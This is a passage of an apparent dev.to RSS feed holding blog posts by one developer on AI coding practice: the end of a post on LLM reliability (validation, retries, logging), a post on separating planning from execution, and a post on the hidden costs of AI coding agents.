&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I know this looks obvious. I'm constantly amazed by how many production AI systems skip this step.&lt;/p&gt;

&lt;h3&gt;
  
  
  3. Retry With Variation
&lt;/h3&gt;

&lt;p&gt;When a call fails validation, don't just retry the same prompt. Rephrase slightly, add an example of the expected output, or increase the temperature slightly. In my experience, 2-3 retries with small prompt variations will recover from most transient failures.&lt;/p&gt;

&lt;p&gt;The key word is "most." You still need a fallback for when retries don't work.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Chain Reliability Compounds
&lt;/h3&gt;

&lt;p&gt;This is where it gets interesting. If one LLM call is 95% reliable, a chain of 5 calls is about 77% reliable (0.95^5). That's a real problem.&lt;/p&gt;

&lt;p&gt;The solution is boring: make each step independently validated, with clear success/failure signals. If step 3 fails, you need to know whether to retry step 3 or go back to step 2. You need checkpointing.&lt;/p&gt;

&lt;p&gt;Sound familiar? It's the exact same pattern as any distributed system. Message queues, retry policies, dead letter queues, idempotency keys. The LLM is just another unreliable service in your architecture.&lt;/p&gt;

&lt;h3&gt;
  
  
  5. Log Everything
&lt;/h3&gt;

&lt;p&gt;In a traditional app, you can reproduce bugs. With LLMs, the same input might produce different output tomorrow. Log the full prompt, the full response, and the validation result for every call. When something goes wrong in production, you'll need this to understand what happened.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Mental Shift
&lt;/h2&gt;

&lt;p&gt;The developers I see struggling with LLM reliability are usually thinking about it as an AI problem. They're reading papers about prompt engineering, fine-tuning, and model selection.&lt;/p&gt;

&lt;p&gt;The developers who ship reliably are thinking about it as an infrastructure problem. The LLM is a service that sometimes returns bad data. Build accordingly.&lt;/p&gt;

&lt;p&gt;That's not exciting. It's not going to get you Twitter engagement. But it works.&lt;/p&gt;

&lt;h2&gt;
  
  
  One Thing To Try
&lt;/h2&gt;

&lt;p&gt;If you have an LLM call in production right now without output validation, add it this week. Just schema validation on the response. Track how often it fails. You'll learn more from that one metric than from any blog post (including this one).&lt;/p&gt;




&lt;h2&gt;
  
  
  More on AI Coding Tools and Workflows
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/separate-planning-from-execution-the-ai-coding-workflow-that-actually-works-1n00"&gt;The AI Coding Workflow That Actually Works: Separate Planning from Execution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/i-use-ai-on-my-codebase-every-day-heres-what-ive-stopped-trusting-it-with-13mi"&gt;I Use AI Coding Tools Every Day. Here's What I've Stopped Trusting Them With.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/the-metr-study-changed-how-i-think-about-ai-coding-4i84"&gt;Developers Think AI Makes Them 24% Faster. The Data Says 19% Slower.&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>programming</category>
      <category>llm</category>
      <category>architecture</category>
    </item>
    <item>
      <title>The AI Coding Workflow That Actually Works: Separate Planning from Execution</title>
      <dc:creator>Matthew Hou</dc:creator>
      <pubDate>Mon, 23 Feb 2026 10:01:51 +0000</pubDate>
      <link>https://dev.to/matthewhou/separate-planning-from-execution-the-ai-coding-workflow-that-actually-works-1n00</link>
      <guid>https://dev.to/matthewhou/separate-planning-from-execution-the-ai-coding-workflow-that-actually-works-1n00</guid>
      <description>&lt;p&gt;There's a blog post making the rounds right now about separating planning from execution when using Claude Code. It resonated with me because I've been doing something similar — and I think the principle applies way beyond any single tool.&lt;/p&gt;

&lt;p&gt;Here's the AI coding workflow I've landed on after months of daily AI-assisted coding — and it's the only AI workflow automation pattern that consistently works.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Most AI Workflow Automation Fails
&lt;/h2&gt;

&lt;p&gt;Most developers use AI coding tools like a magic 8-ball. Type a vague request, get a vague result, then spend 20 minutes fixing what it got wrong.&lt;/p&gt;

&lt;p&gt;The issue isn't the model. It's that you're asking it to do two very different jobs at the same time:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Figure out what needs to happen&lt;/strong&gt; (planning)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Write the actual code&lt;/strong&gt; (execution)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;These require different kinds of thinking. When you mash them together, you get code that's structurally okay but solves the wrong problem, or code that solves the right problem but in a way that doesn't fit your codebase.&lt;/p&gt;

&lt;p&gt;This is why most attempts at AI workflow automation fall flat — people automate the wrong step.&lt;/p&gt;

&lt;h2&gt;
  
  
  How to Build an AI Coding Workflow That Works
&lt;/h2&gt;

&lt;p&gt;Before I touch any code, I write out what I want in plain English. Not a prompt — a spec. Something like:&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;"Add rate limiting to the /api/search endpoint. Use a sliding window counter stored in Redis. Limit: 100 requests per minute per API key. Return 429 with a Retry-After header when exceeded. Add middleware so other endpoints can use the same pattern."&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;That's it. No code. No implementation details. Just a clear statement of what the result should look like.&lt;/p&gt;

&lt;p&gt;Then I feed this to the AI as the planning step: "Break this down into subtasks. Don't write code yet."&lt;/p&gt;

&lt;p&gt;The model comes back with a task list. I review it, adjust priorities, remove things it hallucinated, add things it missed. Takes about 2 minutes.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;Then&lt;/em&gt; I hand each subtask to the AI for execution, one at a time.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Separating Planning from Execution Works
&lt;/h2&gt;

&lt;p&gt;Three reasons:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. You catch bad assumptions early.&lt;/strong&gt; If the AI's plan includes "create a new Redis connection for each request," you spot that in the planning phase and correct it before any code exists. Way cheaper than debugging it later.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. You maintain architectural control.&lt;/strong&gt; The AI writes code within the boundaries you set, not whatever it thinks is clever. Your codebase stays consistent.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;3. The code quality goes way up.&lt;/strong&gt; Smaller, well-scoped tasks produce better code than "build me a feature." It's the same reason we break work into tickets for human engineers.&lt;/p&gt;

&lt;h2&gt;
  
  
  My AI Workflow Automation Setup (Step by Step)
&lt;/h2&gt;

&lt;p&gt;Here's what a typical session looks like:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;I write the spec&lt;/strong&gt; — 2-5 sentences describing the end state&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AI creates the plan&lt;/strong&gt; — ordered subtask list with file paths&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;I review and adjust&lt;/strong&gt; — usually takes 2 minutes, sometimes catches major issues&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AI executes each subtask&lt;/strong&gt; — I review each output before moving on&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;I handle the integration&lt;/strong&gt; — connecting the pieces, running tests, verifying behavior&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Steps 1 and 3 are where I add the most value. Steps 2 and 4 are where AI adds the most value. Step 5 is shared.&lt;/p&gt;

&lt;p&gt;This workflow works with any AI coding tool — Claude Code, Cursor, GitHub Copilot, or even ChatGPT with copy-paste. The principle is tool-agnostic.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Uncomfortable Truth About AI Coding Speed
&lt;/h2&gt;

&lt;p&gt;This workflow is slower than "just ask the AI to build it." At least, it &lt;em&gt;feels&lt;/em&gt; slower. But when I tracked my actual time over a month, the planning-first approach was about 40% faster end-to-end because I almost never had to throw away large chunks of AI-generated code and start over.&lt;/p&gt;

&lt;p&gt;The biggest time sink in AI-assisted coding isn't generation — it's rework. Planning eliminates most rework.&lt;/p&gt;

&lt;h2&gt;
  
  
  What AI Workflow Automation Can't Replace
&lt;/h2&gt;

&lt;p&gt;Not everything belongs in this workflow:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Bug investigation&lt;/strong&gt; — I still read stack traces and reproduce issues myself. AI is great at suggesting fixes, terrible at understanding &lt;em&gt;why&lt;/em&gt; something broke in your specific environment.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Architecture decisions&lt;/strong&gt; — AI can propose options, but I decide. It doesn't know the team's priorities or the product roadmap.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Code review&lt;/strong&gt; — I review everything the AI writes. Every line. Not because I don't trust it, but because I need to understand it for when it breaks at 2am.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Try This AI Coding Workflow Tomorrow
&lt;/h2&gt;

&lt;p&gt;If you're currently using AI as a code generator, try one thing tomorrow: before your next feature, write down what you want in 3 sentences. Ask the AI to make a plan. Review the plan. &lt;em&gt;Then&lt;/em&gt; start coding.&lt;/p&gt;

&lt;p&gt;You'll probably be surprised how much better the output is.&lt;/p&gt;




&lt;h2&gt;
  
  
  More on AI Coding Workflows
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/i-use-ai-on-my-codebase-every-day-heres-what-ive-stopped-trusting-it-with-13mi"&gt;I Use AI Coding Tools Every Day. Here's What I've Stopped Trusting Them With.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/the-real-cost-of-running-ai-coding-agents-its-not-what-you-think-2oon"&gt;The Real Cost of Running AI Coding Agents (It's Not What You Think)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/the-metr-study-changed-how-i-think-about-ai-coding-4i84"&gt;Developers Think AI Makes Them 24% Faster. The Data Says 19% Slower.&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>coding</category>
      <category>workflow</category>
      <category>tutorial</category>
    </item>
    <item>
      <title>The Real Cost of Running AI Coding Agents (It's Not What You Think)</title>
      <dc:creator>Matthew Hou</dc:creator>
      <pubDate>Sun, 22 Feb 2026 14:06:31 +0000</pubDate>
      <link>https://dev.to/matthewhou/the-real-cost-of-running-ai-coding-agents-its-not-what-you-think-2oon</link>
      <guid>https://dev.to/matthewhou/the-real-cost-of-running-ai-coding-agents-its-not-what-you-think-2oon</guid>
      <description>&lt;p&gt;Everyone talks about AI coding agents saving time. Nobody talks about the hidden costs that show up after the first week.&lt;/p&gt;

&lt;p&gt;I've been running AI agents as part of my daily dev workflow for months now. Here's the honest breakdown of what it actually costs — and I'm not just talking about API bills.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Obvious Cost: Tokens
&lt;/h2&gt;

&lt;p&gt;Yes, tokens add up. If you're using a coding agent that reads your full codebase context every time, you can burn through $20-50/day easy on a medium project. Most people figure this out fast and either optimize or quit.&lt;/p&gt;

&lt;p&gt;But this is the smallest cost.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Hidden Cost: Context Switching Tax
&lt;/h2&gt;

&lt;p&gt;Here's what nobody warns you about. When an AI agent is generating code in one file, you naturally start reviewing another file, or checking Slack, or reading docs. Feels productive, right?&lt;/p&gt;

&lt;p&gt;It's not. You're paying a context switching tax every time you come back to evaluate the AI's output. I tracked this for two weeks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Without AI agent&lt;/strong&gt;: ~4 deep focus blocks per day, avg 45 min each&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;With AI agent (multitasking)&lt;/strong&gt;: ~7 shallow blocks, avg 18 min each&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Total productive minutes were similar. But the &lt;em&gt;quality&lt;/em&gt; of my thinking in those 45-min blocks was dramatically better than the 18-min ones.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Biggest Cost: Atrophied Debugging Skills
&lt;/h2&gt;

&lt;p&gt;This one creeps up on you. After a month of letting agents handle most bug fixes, I noticed something: when I hit a genuinely hard bug that the AI couldn't solve, I was &lt;em&gt;slower&lt;/em&gt; at debugging it than I would've been before.&lt;/p&gt;

&lt;p&gt;My mental model of the codebase had gaps. I'd skipped the "boring" debugging that actually builds deep understanding.&lt;/p&gt;

&lt;h2&gt;
  
  
  What I Changed
&lt;/h2&gt;

&lt;p&gt;I don't use AI agents less — I use them differently:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;No multitasking during generation.&lt;/strong&gt; I watch what the agent does. It's slower but I maintain context.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Manual debugging Fridays.&lt;/strong&gt; One day a week, no AI assistance for bug fixes. Keeps the skill sharp.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token budgets, not time budgets.&lt;/strong&gt; I set a daily token limit. When it runs out, I code manually. Forces me to be deliberate about what I delegate.&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  The Bottom Line
&lt;/h2&gt;

&lt;p&gt;AI coding agents are genuinely useful. But if you're not tracking what you're giving up to use them, you're optimizing for speed while losing depth.&lt;/p&gt;

&lt;p&gt;The developers who'll thrive aren't the ones using the most AI. They're the ones who know exactly when to use it and when to put it away.&lt;/p&gt;




&lt;h2&gt;
  
  
  More on AI Coding Tools and Workflows
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/separate-planning-from-execution-the-ai-coding-workflow-that-actually-works-1n00"&gt;The AI Coding Workflow That Actually Works: Separate Planning from Execution&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/i-use-ai-on-my-codebase-every-day-heres-what-ive-stopped-trusting-it-with-13mi"&gt;I Use AI Coding Tools Every Day. Here's What I've Stopped Trusting Them With.&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://dev.to/matthewhou/the-metr-study-changed-how-i-think-about-ai-coding-4i84"&gt;Developers Think AI Makes Them 24% Faster. The Data Says 19% Slower.&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ai</category>
      <category>programming</category>
      <category>productivity</category>
      <category>discuss</category>
    </item>
  </channel>
</rss>
